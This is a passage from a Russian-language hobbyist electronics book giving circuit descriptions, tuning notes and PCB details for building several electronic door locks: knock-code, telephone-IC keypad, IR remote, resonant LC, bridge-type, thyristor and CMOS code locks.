Допустим, что при нашем коде 1539, удар по двери произведен в момент появления на индикаторе HL1 единицы. Тогда уровень единицы будет и на выходе 1 (вывод 2) счетчика DD2 и на входе А электронного ключа DD3. 1. В момент удара элементы DD6. 1, DD6. 2, DD6. 3 формируют положительный импульс, включающий ключи микросхемы DD3. Сигналы с выходов счетчика DD2 проходят на входы R триггеров DD4. 1—DD4. 4. Но, так как триггеры переключаются только единичным уровнем, то в данном случае переключится только триггер DD4. 1 и на его выходе и входе S триггера DD4. 2 будет зафиксирован уровень нуля, который дает возможность триггеру DD4. 2 переключиться при правильном наборе второй цифры кода. Так как триггеры DD4. 1 — DD4. 4 могут переключаться в строго определенной последовательности, то и цифры кода должны быть набраны по порядку.

6-1-123.jpg

Рис. 6. 32. Печатная плата дешифратора замка

Выходы счетчика DD2, не входящие в кодовое слово, через диоды VD1 —VD6 соединяются со входом ключевого элемента DD5. 2. Поэтому, если удар произведен в момент появления некодовой цифры, единичный уровень поступает на вывод 6 и вывод 5 элемента DD5. 2. Появление на выходе элемента DD5. 2 (вывод 4) нулевого уровня приводит к запуску одновибратора на элементах DD5. 3, DD5. 4. Этот одновибратор формирует отрицательный импульс длительностью около одной минуты, который через элемент DD5. 1 устанавливает триггеры DD4. 1 —DD4. 4 в исходное состояние, а также обнуляет счетчики DD2 и DD7 и блокирует их на время действия импульса. На это время импульсы с генератора проходят через элемент DD1. 3 и могут служить для запуска звукового генератора системы сигнализации (на схеме не показан). В то же время через диод VD8 блокируется вход схемы для предотвращения зацикливания устройства. Если код набран правильно, то нулевой уровень устанавливается на выходе триггера DD4. 4 и, соответственно, единичный — на выходе элемента DD6. 4, который через диод VD9 блокирует вход устройства. Одновременно срабатывает реле К1, т. к. открывается транзистор VT2, и своими контактами включает исполнительное устройство. Дверь можно открывать. При открывании двери размыкаются контакты кнопки SB1, цепь питания устройства размыкается, реле обесточивается. При последующем закрывании двери устройство снова включается в дежурный режим через 30 с. Это время устанавливается времязадающей цепью R3C3.

Настройка заключается в установке желаемой чувствительности устройства подбором резистора R 14, а также путем подбора номиналов элементов R 10 и С5 так, чтобы схема не зацикливалась. Желаемую скорость счета можно установить подбором сопротивления резистора R1.

Вместо пьезокерамической головки В1 типа ГЗП можно использовать пьезокерамический излучатель типа ЗП-1 и т. п.

6-1-124.jpg

Рис. 6. 33. Размещение деталей на плате дешифратора замка

Устройство выполнено на печатной плате размером 58х88 мм из двухстороннего фольгированного стеклотекстолита. Чертеж платы представлен на рис. 6. 32. Размещение деталей на плате показано на рис. 6. 33.

Рис. 6.30. Кодовый замок без кнопок управления

Изображение: 

Рис. 6.31. Печатная плата индикатора и размещение деталей на ней

Изображение: 

Рис. 6.32. Печатная плата дешифратора замка

Изображение: 

Рис. 6.33. Размещение деталей на плате дешифратора замка

Изображение: 

6.1.13. Кодовый замок на телефонной микросхеме.

6. 1. 13. Кодовый замок на телефонной микросхеме

Это кодовое устройство состоит из пульта управления с десятью кнопками и исполнительного устройства. Код состоит из четырех цифр, от 1 до 9, которые набираются в определенной последовательности. Имеется защита от последовательного подбора кода. Если следующая цифра набрана неправильного, все предыдущие, набранные правильно, стираются и код нужно набирать сначала.

В основе работы системы лежит принцип число импульсного кодирования, при котором каждой цифре кода присваивается определенное число импульсов, т. е. числу, например, шесть соответствует шесть импульсов.

Принципиальная схема электронной части замка приведена на рис. 6. 34. В ее основе лежит специализированная телефонная микросхема — электронный номеронабиратель с импульсным набором номера. Это широко распространенная микросхема КР1008ВЖ1. Микросхема позволяет формировать последовательности, состоящие из 1—10 импульсов, в зависимости от состояния клавиатуры, т. е. от нажатой в данный момент кнопки. Кроме того, микросхема имеет память, поэтому нажимать кнопки можно не дожидаясь окончания предыдущей импульсной посылки.

В данном устройстве используются только комбинации от 1 до 9 импульсов в посылке. Кодовые посылки формируются при нажатии кнопок SB1—SB9. Кодовая посылка, состоящая из 10 импульсов, в данном устройстве не формируется. Кнопка SB0 служит для приведения устройства в исходное состояние перед набором кода. Каждый раз перед набором четырехзначного кода рекомендуется нажать кнопку SB0.

Необходимый код устанавливается проволочными перемычками на печатной плате замка. В данном случае (рис. 6. 34) установлен код «2375».

Начнем набор кода с приведения схемы в исходное состояние. Для этого необходимо нажать на кнопку SB0. При этом на вход D (вывод 15) микросхемы DD1 поступит напряжение питания, т. е. уровень логической единицы, который переведет микросхему в исходное состояние. Одновременно уровень логической единицы поступает через диод VD8 на вход S (вывод 6) триггера DD5. 1, что приводит к появлению логической единицы на его выходе, а это, в свою очередь, — к установке триггеров DD5. 2, DD5. 3, DD5. 4 в единичное состояние. Схема готова к приему числового кода.

Произведем набор кода путем последовательного нажатия кнопок SB2, SB3, SB7, SB5. При этом положительные импульсы, число которых соответствует номеру нажатой кнопки, формируются на выходе N (выход 12) микросхемы DD1 и поступают на вход инвертирующего элемента DD2. 1. В исходном состоянии на выходе последнего (вывод 10) присутствует высокий уровень. По фронту первого положительного импульса на выходе 10 элемента DD2. 1 формируется

6-1-131.jpg

Рис. 6. 34. Кодовый замок на телефонной микросхеме

отрицательный импульс. Конденсатор СЗ быстро разряжается через диод VD1. На выводе 4 элемента DD2. 3 появляется уровень логического нуля. Это приводит к закрыванию ключевых элементов DD4. 1 —DD4. 4. Одновременно конденсатор С2 разряжается через резистор R4, и на входе R счетчика устанавливается нулевой уровень, счетчик DD3 готов к подсчету поступающих на его вход CN (выход 14) импульсов. Как только набор очередной цифры прекратится, в импульсном сигнале, поступающем с вывода 12 микросхемы DD1, возникнет пауза, достаточная для зарядки конденсатора СЗ через резистор R3. В момент заряда конденсатора СЗ до уровня логической единицы на выходе элемента DD2. 3 уста-

6-1-132.jpg

Рис. 6. 35. Печатная плата замка на телефонной микросхеме

навливается единичный уровень, который переводит ключевые элементы микросхемы DD4 в открытое состояние. Если код набран правильно, через элемент DD4. 1 с выхода 2 счетчика DD3 (вывод 4) на вход R триггера DD5. 1 поступит уровень логической единицы, который переводит триггер DD5. 1 в нулевое логическое состояние. Уровень логического нуля на выходе триггера DD5 служит сигналом разрешения на прием второй цифры кода триггером DD5. 2.

Единичный уровень напряжения с вывода 4 элемента DD2. 3 через резистор R4 заряжает конденсатор С2. В момент достижения на конденсаторе С2 напряжения логической единицы счетчик DD3 обнуляется и счетчик готов к приему очередной последовательности импульсов.

После набора четырех цифр кода на выходе инвертирующего элемента DD2. 4 устанавливается единичный уровень, транзистор VT1 открывается, срабатывает реле К1 и своими контактами включает исполнительный механизм..

Если при наборе кода в одной из цифр была допущена ошибка, то на одном из выходов счетчика DD3, не подключенном к ключевым элементам DD4. 1 — DD4. 4, устанавливается единичный уровень. Этот сигнал через один из диодов VD2—VD6 поступает на базу транзистора VT2. После окончания серии импульсов на выходе элемента DD2. 3 устанавливается уровень логической единицы и транзистора VT2 открывается, a VT3 закрывается. При этом на вход S триггера DD5. 1 поступит уровень логической единицы, который установит триггер DD5. 1 и соответственно триггеры DD5. 2—DD5. 4 в исходное состояние. В этом случае потребуется повторный набор всего кода.

При открывании двери устройство выключается, т. к. размыкаются контакты кнопки SB 10, обесточивается обмотка реле К1 и исполнительный механизм возвращается в исходное состояние.

6-1-133.jpg

Рис. 6. 36. Размещение деталей на плате замка

Настройка устройства сводится к подбору сопротивления резистора R3 таким образом, чтобы при поступлении импульсов на выводе 4 элемента DD2. 3 присутствовал логический нуль, а в паузе между наборными посылками двух цифр — единица. Сопротивление резистора R4 подбирается так, чтобы в паузе между посылками счетчик DD3 успевал установиться в нулевое логическое состояние.

Электронная часть кодового замка смонтирована на печатной плате размером 65х70 мм, изготовленной их двухстороннего фольгированного стеклотекстолита. Чертеж платы представлен на рис. 6. 35, а размещение деталей на плате — на рис. 6. 36.

Рис. 6.34. Кодовый замок на телефонной микросхеме

Изображение: 

Рис. 6.35. Печатная плата замка на телефонной микросхеме

Изображение: 

Рис. 6.36. Размещение деталей на плате замка

Изображение: 

6.1.14. Дистанционно управляемый замок на микросхемах.

6.1.14. Дистанционно управляемый замок на микросхемах

В отличие от вышеописанных, это устройство выполнено на широко распространенных микросхемах серии К561. Оно позволяет получить более 3000 четырехзначных кодовых комбинаций. Для дистанционного управления может быть использован радиочастотный или ИК каналы. Управление производится путем нажатия всего одной кнопки, расположенной на выносном пульте управления. Устройство может быть использовано не только для открывания дверей, но также и для снятия с охраны систем сигнализации квартиры, офиса или автомобиля.

Принципиальная схема устройства приведена на рис. 6. 37. Оно состоит из следующих функциональных узлов: мультивибратора на элементах DD1. 1, DD1. 2, десятичного счетчика с дешифратором DD2, мультиплексора DD4, системы управления на двоичном счетчике DD3 и элементах DD1. 3, DD1. 4, выходного каскада на транзисторе VT1.

При первоначальном подключении источника питания счетчики DD2 и DD3 могут установиться в произвольное положение. При этом устройство выдаст произвольную кодовую комбинацию до появления высокого уровня на выводе 5 счетчика DD3. В дальнейшем устройство будет выдавать кодовую комбинацию только после нажатия кнопки SB1. Итак, в исходном состоянии на выводе 5 счетчика DD3 будет уровень логической единицы, который через диод VD2 поступает на вход R счетчика DD2, сбрасывая его в нулевое состояние, и вывод 2 элемента DD1. 1, входящего в состав генератора прямоугольных импульсов, запрещая работу последнего.

При нажатии на кнопку SB1 зарядный ток конденсатора СЗ создает положительный импульс на входе установки нуля R счетчика DD3. В результате на всех выходах DD3 устанавливаются нулевые уровни. Это приводит к появлению на выводе 2 элемента DD1. 1 и выводе 15 счетчика DD2 также нулевых уровней. Генератор на элементах DD1. 1 и DD1. 2 начинает вырабатывать прямоугольные импульсы с частотой около 125 Гц. С выхода генератора импульсы поступают на транзистор VT1 выходного каскада и на счетный вход CN счетчика DD2. При этом транзистора VT1 открывается и конденсатор С4 быстро разряжается через светодиод HL1, что приводит к появлению мощного коротко-

6-1-141.jpg

Рис. 6. 37. Ключевое кодирующее устройство

го импульса в инфракрасном диапазоне частот. В промежутках между импульсами конденсатор С4 подзаряжается от источника питания через резистор R7. Счетчик DD2 подсчитывает приходящие импульсы, и на одном из выходов, соответствующем количеству счетных импульсов, появляется уровень логической единицы. Поскольку на адресных входах мультиплексора DD4 (выводы 9 и 10) присутствует напряжение низкого уровня, то выход последнего (вывод 3) соединен с входом 1 (вывод 1), подключенным к выходу 2 счетчика DD2 (вывод 4).

Как только число поступающих от генератора импульсов достигнет установленного перемычкой значения первой кодовой цифры (в данном случае 2), логическая единица со второго выхода счетчика DD2 через мультиплексор DD4 поступит на вывод 9 элемента DD1. 3. На элементах DD1. 3, DD1. 4 собран одновибратор, формирующий паузу между пачками импульсов. Появление единицы на выводе 9 элемента DD1. 3 запускает одновибратор, и на его выходе (вывод 11 DD1. 4) формируется положительный импульс с длительностью, определяемой параметрами времязадающей цепи C2R2. Длительность этого импульса равна длительности паузы между пачками импульсов. Положительный импульс поступает на вход CN счетчика DD3 непосредственно, а через диод VD1 — на вывод 2 элемента DD1. 1, запрещая работу генератора импульсов, и на вход R счетчик DD2, устанавливая его нулевое состояние. После окончания этого импульса начинается процесс формирования второй цифры кодовой комбинации. Импульсом одновибратора показания счетчика DD3 увеличиваются на единицу и на его выходе 1 (вывод 3) появляется уровень логической единицы, в результате чего код на входе управления мультиплексора DD4 (01) изменяется и к его выходу подключается вход 2 (вывод 5 DD4) выход 4 (вывод 10) счетчика DD2. Импульсы с генератора вновь поступают на транзистор VT1 и счетчик DD2. После прихода четырех импульсов, на выходе 4 счетчика DD2 (вывод 10) появляется высокий логический уровень, которым через перемычку и мультиплексор и вновь запускается одновибратор. Далее процесс формирования кодового слова повторяется. Это происходит до тех пор, пока не будет сформирована последняя пачка импульсов (четвертая пачка). Затем формируется четвертый импульс паузы, который устанавливает счетчик DD3 в состояние, когда на выходе 4 (вывод 5) появляется уровень логической единицы, который через диод VD2 поступает на вход установки нуля R счетчика DD2 и блокирует генератор импульсов на элементах DD1. 1, DD1. 2. Устройство переходит в ждущий режим до следующего нажатия на кнопку SB1. Цепь, состоящая из резистора R3 и конденсатора СЗ, служит для устранения сбоев от дребезга контактов кнопки SB1.

Транзистор VT1 может быть заменен на КТ816, КТ973. Вместо указанного на схеме светодиода HL1 можно использовать два включенных последовательно светодиода типа АЛ107А, Б. Печатная плата изготовлена из пластины двухстороннего фольгированного стеклотекстолита размером 33х48 мм. Внешний вид рисунка платы показан на рис. 6. 38. Размещение деталей на плате показано на рис. 6. 39. Питается устройство от батарейки или аккумуляторов напряжением 3 В.

6-1-142.jpg

Рис. 6. 38. Печатная плата кодирующего блока

Приемное и декодирующее устройства выполнены в виде отдельного блока, принципиальная схема которого приведена на рис. 6. 40.

Декодер состоит из следующих узлов: детектора кодовых импульсов и импульсов паузы на элементах DD1. 1—DD1. 4; десятичного счетчика числа импульсов в пачке на микросхеме DD2; мультиплексора DD4, переключающего перемычки, которыми задается кодовое число; устройства управления на двоичном счетчике DD3. 1 и элементе DD5. 1; распознавателя кода на счетчике DD3. 2;

триггера управления на элементах DD5. 2, DD5. 3.

Фотоприемник выполнен по типовой схеме с использованием специализированной микросхемы DA1 типа К1056ПУ1. Его устройство и работа подробно

6-1-143.jpg

Рис. 6. 39. Размещение деталей на плате кодирующего блока

описаны в различной литературе и особенностей не имеют. Вообще, фотоприемник может быть любого типа, важно лишь, чтобы при приеме сигнала на его выходе были отрицательные импульсы.

В то время когда кодовый посылки нет, на выходе фотоприемника (коллектор транзистора VT1) высокий логический уровень. Этот сигнал через резистор R5 поступает на выводы 12, 13 элемента DD1. 1. На выводах 10 и 4 этой же микросхемы (DD1) тоже устанавливаются уровни логической единицы. Цепь R5C6 совместно с элементами DD1. 1 и DD1. 2 служит для селекции кодовых импульсов и одновременно выполняет функции интегратора и триггера Шмитта. Выходные импульсы этого селектора, снимаемые с вывода 10 элемента DD1. 2, несколько задержаны относительно входных и имеют крутые фронты, не зависимо от длительности фронтов входных импульсов, поступающих с фотоприемника. Кроме того, такое входное устройство имеет особенность пропускать импульсы только с длительностью не менее определенного значения, определяемого постоянной времени цепи R5C6. В результате импульсы, вызванные атмосферными или другими помехами и имеющие малую длительность, не поступают на вход CN счетчика DD2.

В течение всего времени, пока поступают импульсы кодовой посылки, напряжение на выходе 4 элемента DD1. 4 поддерживается на нулевом уровне. Цепь на VD5, R7 и С8 служит для формирования сигнала окончания кодовой посылки и выполняет функции детектора пауз, но с большей постоянной времени. В течение всего времени кодовой посылки, состоящей из пачек и пауз, напряжение на конденсаторе С8 поддерживается на уровне нуля. Как только посылка заканчивается, конденсатор С8 заряжается через резистор R7 и до уровня логической единицы.

Пачки импульсов кодовой посылки поступают на вход CN счетчика DD2. По окончании каждой пачки на том выходе DD2, номер которого соответствует числу импульсов в пачке, устанавливается уровень логической единицы. Импульс паузы, сформированный элементами DD1. 3, DD1. 4, поступает на входы инвертирующего элемента DD5. 1 и через резистор R8 начинает заряжать конденсатор С5. Проинвертированный импульс паузы с выхода элемента DD5. 1 поступает на стробирующий вход мультиплексора DD4 (вывод 6). При этом к

6-1-144.jpg

Рис. 6. 40. Принципиальная схема декодирующего устройства

выходу мультиплексора подключается вход, код которого задан счетчиком DD3. 1 (в данном случае код 00 и вход 1 (вывод 1 DD4)). Если число импульсов в пачке соответствует первой кодовой цифре, то на выход мультиплексора и на вход СР счетчика DD3. 2 поступает уровень логической единицы (через проволочную перемычку) с выхода 2 счетчика DD2.

Все эти процессы происходят в то время, пока конденсатор С5 заряжается через резистор R8. Как только напряжение на нем достигнет уровня логической единицы, счетчик DD2 установится в нулевое состояние, а счетчик DD3. 1 переключится в следующее состояние, на его выходах появится код 01 и мультиплексор DD4 подключится ко второй перемычке (вывод 5). Отрицательный перепад напряжения через мультиплексор DD4 поступает на вход СР счетчика DD3. 2 и переключает его. В результате, по окончании каждой пачки импульсов, если число импульсов в ней совпадает с числом, заданным перемычкой, на вход СР DD3. 2 будет воздействовать положительный импульс, по спаду которого счетчик DD3. 2 переходит в следующее состояние.

Если во всех четырех пачках импульсов число импульсов соответствуют заданному коду, то по окончании кодовой посылки счетчик DD3. 2 установится в состояние, когда на выводе 13 последнего будет высокий логический уровень. После завершения кодовой посылки конденсатор С8 будет заряжаться через резистор R7 и, как только напряжение на нем достигнет порогового уровня логической единицы, счетчики DD3. 1 и DD3. 2 обнулятся. Схема перейдет в режим ожидания.

Таким образом, в конце каждой кодовой посылки, если код принят правильно, на выводе 13 счетчика DD3. 2 появляется положительный импульс, длительность которого зависит от параметров цепи R7C8. Этот импульс поступает на один из входов RS-триггера, выполненного на элементах DD5. 2 и DD5. 3, и переключает его в противоположное состояние. При этом на выводе 10 элемента DD5. 2 устанавливается уровень логической единицы, который через резистор R11 поступает на транзистор VT2. Последний открывается, срабатывает реле К1 и своими контактами включает исполнительный механизм — электромагнит, двигатель и т. п.

При открывании двери контакты кнопки SB1 размыкаются и устройство обесточивается. Реле К1 выключается. При закрывании двери напряжение питания+ 9 В через контакты SB1 поступает на элементы схемы. Конденсатор С 10 заряжается через резистор R 10, и положительный импульс, появляющийся на выводе 8 элемента DD5. 2, устанавливает RS-триггер в исходное состояние.

Если на вход детектора поступает посылка с другим кодом, или количеством пачек импульсов, то после ее окончания система переходит в ждущий режим и на выходе не появляется импульс, включающий исполнительное устройство.

Устройство смонтировано на плате размером 55х78 мм из двухстороннего фольгированного стеклотекстолита. Вид платы показан на рис. 6. 41, а размещение деталей на ней — на рис. 6. 42.

Питается устройство от стабилизированного источника тока напряжением + 9... 12 В.

6-1-145.jpg

Рис. 6. 41. Печатная плата декодирующего блока

6-1-146.jpg

Рис. 6. 42. Размещение деталей на плате декодирующего блока

Рис. 6.37. Ключевое кодирующее устройство

Изображение: 

Рис. 6.38. Печатная плата кодирующего блока

Изображение: 

Рис. 6.39. Размещение деталей на плате кодирующего блока

Изображение: 

Рис. 6.40. Принципиальная схема декодирующего устройства

Изображение: 

Рис. 6.41. Печатная плата декодирующего блока

Изображение: 

Рис. 6.42. Размещение деталей на плате декодирующего блока

Изображение: 

6.1.4. Резонансные электронные замки и ключи.

6.1.4. Резонансные электронные замки и ключи

Принцип действия этих электронных замков и ключей основан на явлении электронного резонанса. Известно, что существует два вида резонансных колебательных LC-контуров: последовательный и параллельный. Схема таких контуров и графики, иллюстрирующие зависимость общего сопротивления контура от частоты подводимого сигнала, показаны на рис. 6. 5 и 6. 6.

6-1-41.jpg

Рис. 6. 5. Последовательный колебательный контур

6-1-42.jpg

Рис. 6. 6. Параллельный колебательный контур

Из графиков, изображенных на этих рисунках, видно, что сопротивление Z последовательного LC-контура (рис. 6. 5) на частоте резонанса fp стремится к нулю, а сопротивление параллельного (рис. 6. 6) LC-контура — к бесконечности. Иначе говоря, в момент резонанса последовательный контур подобен отрезку провода (точки А и В замкнуты), а параллельный — обрыву между точками А и В.

Резонансная частота контура может быть вычислена по известному соотношению:

6-1-43.jpg

где fp — резонансная частота контура, Гц; L — индуктивность катушки, Гн;

С — емкость конденсатора, Ф

Минимальное или максимальное сопротивление контура проявляется тем ярче, чем меньше потери в нем.

Приборы с использованием резонансного метода хорошо работают только на тех частотах, на которых резонансные свойства контуров выражены наиболее ярко. Для резонансного замка наиболее приемлемым является диапазон частот 50—500 кГц.

Для замков, использующих резонансный метод, — LC-контур — ключом может быть катушка индуктивности L или конденсатор С, входящие в этот контур. Если функцию ключа выполняет конденсатор, то контурная катушка должна находиться внутри замка, а на внешнюю сторону двери должны быть выведены два контакта, для подключения конденсатора. При подключении конденсатора к катушке в образовавшемся контуре возникает резонанс, изменяющий его сопротивление.

Примером использования последовательного контура может служить замок, схема которого приведена на рис. 6. 7.

Пока конденсатор СЗ, являющийся ключом замка, не подключен к контактам соединителя XI, выведенным на наружную сторону двери, сопротивление контура L1C2 на участке АВ большое, ток через резистор R4 незначительный и падение напряжения на нем недостаточно для открывания транзистора VT3. Если контакты соединителя X1 замкнуть накоротко отрезком провода, состояние замка не изменится, т. к. не будут соблюдены условия резонанса и сопротивление катушки L1 будет все равно больше, чем резонансное сопротивление Z контура. С тем же успехом можно подключать к контактам XI катушки индуктивности, резисторы, диоды и даже конденсаторы с емкостью, отличной от емкости конденсатора СЗ. Устройство сработает только в том случае, если подключаемый конденсатор СЗ будет обладать вполне определенным значением емкости (или близкой к ней), при котором в образовавшемся контуре L1 (С2+ СЗ) возникнет последовательный резонанс. Тогда сопротивление контура резко уменьшится,

6-1-44.jpg

Рис. 6. 7. Замок с последовательным резонансным контуром

ток генератора через диод VD1 и резистор R4 возрастает, напряжение, падающее на резисторе R4, откроет транзистор VT3, а следовательно, и тиристор VS1, сердечник электромагнита YA1, связанный с ригелем замка, втянется внутрь катушки и дверь откроется.

Параметры контура рассчитаны на частоту 465 кГц. Генератор замка собран на транзисторе VT1, между коллектором и базой которого включен пьезокерамический фильтр Z1 с резонансной частотой 465 кГц. Это обеспечивает высокую стабильность вырабатываемых генератором колебаний и делает устройство предельно простым. Транзистор VT2 выполняет роль эмиттерного повторителя и служит буферным элементом между генератором и исполнительной частью замка.

Конденсатор С2 устанавливается с внутренней стороны двери и защищает каскад на транзисторе VT3 от воздействия внешних помех. Использование конденсатора С2 позволяет уменьшить емкость конденсатора-ключа СЗ и тем самым уменьшить его размеры. Диод VD1 является однопериодным выпрямителем переменного напряжения, поступающего к контуру от генератора.

В качестве катушки L1 может быть использована контур ПЧ любого радиовещательного приемника, при этом конденсатор контура нужно составить из двух (С2 и СЗ). При использовании, например, броневого карбонильного сердечника СБ-12а, число витков катушки L1 должно составлять 145, 110 или 80 для емкостей контура (С2+ СЗ) 270 пФ, 510 пФ или 1000 пФ соответственно. Фильтр Z1 может быть типа ФП1П-021... 027, ФП1П-041, 043. При невозможности использовать готовые катушки и фильтры конструкцию генератора нужно изменить и выполнить его, например, на микросхеме (рис. 6. 8)

6-1-45.jpg

Частоту генератора можно изменять в широких пределах подстройкой сопротивления резистора R8. При напряжении питания+ 9 В можно использовать микросхемы К176ЛА7 или К176ЛЕ5. При использовании микросхем К561ЛА7 или К561ЛЕ5 напряжение питания может быть 3— 15 В.

Схема замка с параллельным колебательным контуром показана на рис, 6. 9. Здесь функцию ключа также выполняет конденсатор.

Пока конденсатор С2 не подключен к контактам соединителя XI, контур L1C1 не настроен в резонанс с частотой генератора и, следовательно, не оказывает заметного сопротивления колебаниям генератора (см. рис. 6. 8). Выпрямленное диодом VD1 напряжение частотой около 100 кГц открывает транзистор VT1. При этом транзистор VT2 закрывается. Это исходный режим замка. При подключении конденсаторного ключа С2 контур L1 (C1+ С2) оказывается настроенным в резонанс с частотой генератора. Сопротивление его резко возрас-

6-1-46.jpg

Рис. 6. 9. Замок с параллельным контуром

тает, ток через резистор R1 и падение напряжения на нем уменьшаются, вследствие чего транзистор VT1 закрывается. Это приводит к открыванию-транзистора VT2 и тринистора VS1. В результате электромагнит YA1 срабатывает и позволяет открыть дверь.

Рис. 6.5. Последовательный колебательный контур

Изображение: 

Рис. 6.6. Параллельный колебательный контур

Изображение: 

Рис. 6.7. Замок с последовательным резонансным контуром

Изображение: 

Рис. 6.8. Генератор на микросхеме

Изображение: 

Рис. 6.9. Замок с параллельным контуром

Изображение: 

Ф.1 Определение резонансной частоты контура

Изображение: 

6.1.5. Замок мостового типа.

6. 1. 5. Замок мостового типа

Одним из преимуществ замка мостового типа, по сравнению с обычными замками, является то, что они позволяют довольно простыми средствами и достаточно быстро тиражировать ключи в случае возникновения такой необходимости, например при установке замка на входной двери подъезда многоэтажного дома, в дачном кооперативе, на лодочной станции, на гаражной стоянке, в офисе и т. д.

Принцип действия замков мостового типа основан на условии равновесия моста, т. е. произведения сопротивлений противоположных плеч моста должны быть равны. Схема измерительного моста приведена на рис. 6. 10.

6-1-51.jpg

Рис. 6. 10 Схема измерительного моста

К одной из диагоналей моста, например к точками А и В, подводится напряжение источника питания, а к другой — к точкам С и D, подключается ключевое устройство, реагирующее на минимальный сигнал в этой диагонали моста. Напряжение источника питания оказывается приложенным одновременно к двум, соединенным параллельно, делителям напряжения R1R3 и R2R4. Значение напряжения между точками С и D можно получить из условия равновесия моста:

R1R4=R2R3. Это требование относится к мостам постоянного и переменного тока. Схема замка с мостом переменного тока представлена на рис. 6. 11. Ключом такого замка служат последовательно соединенные резистор R4 и конденсатор С4. Другие плечи моста, питающегося переменным напряжением,

6-1-52.jpg

Рис. 6. 11. Замок мостового типа

снимаемым с обмотки IV сетевого трансформатора Т1, образуют цепочки аналогичных элементов. Пока ключ (R4C4) не подключен к контактам соединителя X1, мост разбалансирован. С него на вход ключевого устройства поступает переменное напряжение, которое выпрямляется диодами VD1 и VD2 и сглаживается конденсатором С5. Это напряжение приводит к открыванию транзистора VT1, закрыванию транзистора VT2 и тиристора VS1, обесточивающих обмотку электромагнита YA1. Замок закрыт.

При подключении ключа к контактам соединителя X1 мост оказывается сбалансированным. Напряжение на конденсаторе С5 уменьшается, отчего транзистор VT1 закрывается, а транзистор VT2 и тиристор VS1 открываются. Электромагнит YA1 срабатывает и своим якорем через систему механических тяг освобождает защелку механического замка — дверь можно открывать. При отсоединении ключа все устройство принимает исходное состояние. Для открывания замка изнутри помещения используется кнопка SB1, размещенная около замка с внутренней стороны двери.

Мост, а значит и замок в целом, реагирует только на подключение соответствующего ключа.

Источником питания ключевого устройства служит двухполупериодный выпрямитель VD3 с выходным напряжением 9 В. С обмотки III трансформатора Т1 напряжение 42 В подается на электромагнит YA1. Напряжение обмотки IV, питающей мост, должно быть в пределах 10—15 В. Электромагнит лучше всего использовать готовый, например от магнитофонов «Маяк», «Комета» или «Орбита».

Рис. 6.10 Схема измерительного моста

Изображение: 

Рис. 6.11. Замок мостового типа

Изображение: 

6.1.6. Тиристорный замок.

6. 1. 6. Тиристорный замок

Замок рассчитан на управление восемью кнопками, находящимися на наружной стороне двери. Устройство просто в управлении, изготовлении и налаживании. Принципиальная схема замка приведена на рис. 6. 12.

6-1-61.jpg

Рис. 6. 12. Кодовый замок на тиристорах

Кнопки SB1 — SB4, работающие на замыкание, служат для набора установленного кода, а кнопки SB5 — SB8, работающие на размыкание, — для приведения устройства в исходное состояние, например в случае ошибочного набора кода или его подбора.

Замок срабатывает только при одновременном открывании всех тиристоров VS1—VS4. Добиться этого можно последовательным нажатием кнопок SB4, SB3, SB2 и SB1. При другой последовательности нажатия этих кнопок не все тиристоры будут открыты и, следовательно, открыть дверь не удастся. Исключение составляет случай, когда одновременно нажаты все четыре кнопки SB1— SB4. В случае нажатия на любую из кнопок SB5—SB8 цепь питания электромагнита YA1 обрывается и устройство приводится в исходное состояние. Тоже произойдет и при нажатии всех кодовых кнопок SB1—SB8. Кнопка SB9 служит для приведения замка в исходное состояние после открывания двери. Замок питается от сети переменного тока напряжением 220 В через трансформатор Т1 и двухполупериодный выпрямитель VD2. Для питания замка может быть использован любой блок питания с выходным напряжением 12—60 В, в зависимости от типа используемого электромагнита.

При безошибочном монтаже замок налаживания не требует.

Рис. 6.12. Кодовый замок на тиристорах

Изображение: 

6.1.7. Электронный кодовый замок.

6. 1. 7. Электронный кодовый замок

Этот замок прост в изготовлении и налаживании. При этом он позволяет использовать четырехзначный код и ограничивает время набора последнего. Электронная часть замка выполнена на микросхемах КМОП серии К561. Принципиальная схема устройства приведена на рис. 6. 13.

6-1-71.jpg

Рис. 6.13. Электронный кодовый замок

Устройство состоит из четырех RS-триггеров (две микросхемы К561ТМ2) DD1. 1, DD1. 2, DD2. 1, DD2. 2. Кнопки наборного поля располагаются с наружной стороны двери. Перед набором кода необходимо нажать кнопку SB11 «Сброс». Конденсатор С1 при этом быстро разряжается, а после отпускания кнопки он начинает медленно заряжаться от источника питания + 9 В через резистор R3. Пока напряжение на конденсаторе С1 не достигнет значения+ 4, 5 В и более, на входе S триггера DD1. 1 присутствует нулевой потенциал, который разрешает работу первого RS-триггера на элементе D1. 1.

При нажатии кнопки SB1 (первая цифра кода) триггер переключается и на его прямом выходе положительный потенциал изменяется на нулевой. Этот потенциал разрешает работу следующего триггера на элементе DD1. 2.

После нажатия кнопки SB2 (вторая цифра кода) триггер на элементе DD1. 2 переключается и на его инверсном выходе появляется нулевой потенциал, тем самым разрешается работа следующего RS-триггера на элементе DD2. 2. Далее последовательно нажимают кнопки SB3 (третья цифра кода) и SB4 (четвертая цифра кода), Наконец срабатывает последний RS-триггер на элементе DD2. 1, на его инверсном выходе появляется нулевой потенциал, что приводит к закрыванию транзистора VT1 и, как следствие, к открыванию транзистора VT2, который включает исполнительное устройство, например реле или электромагнит.

Прямой выход RS-триггера DD2. 1 для включения исполнительного устройства использовать нельзя. Это связано с тем, что в случае исполнительное устройство срабатывает даже при нажатии только одной кнопки SB4, т. е. без набора трех первых цифр, а это недопустимо.

Время набора цифр кода ограничено временем заряда конденсатора С1 и зависит от его емкости и сопротивления резистора R3. При номиналах, указанных на рис. 6. 13, время заряда составляет примерно 15 с. Если за это время код не будет набран, то все RS-триггеры возвратятся в исходное состояние и набор придется повторить. Если во время набора кода будет набрана хотя бы одна

6-1-72.jpg

Рис. 6.14. Печатная плата электронного замка

неправильная цифра (кнопки SB5—SB10), то все RS-тригтеры также возвратятся в исходное состояние.

Количество цифр в коде может быть увеличено, если включить последовательно еще несколько микросхем. Но, как показывает практика, четыре цифры обеспечивают достаточную надежность системы.

Печатная плата устройства выполнена из одностороннего фольгированного стекло текстолита размером 65х40 мм. Рисунок печатной платы приведен на рис. 6. 14. В качестве исполнительного устройства использовано реле РЭС-49. Размещение элементов на плате устройства приведено на рис. 6. 15. Микросхемы DD1, DD2 серии К561ТМ2 можно заменить без изменения рисунка печатной платы на микросхемы К176ТМ2. Резисторы R1 —R7 — типа МЛТ-0, 125 или им аналогичные. Конденсатор С1 нужно выбрать с возможно меньшим током утечки. Время набора устанавливают экспериментально, путем подбора номинала конденсатора С1. В качестве кнопок можно использовать любые, в том числе и от телефонного аппарата (кроме SB11).

6-1-73.jpg

Рис. 6.15 Размещение детален на плате электронного замка

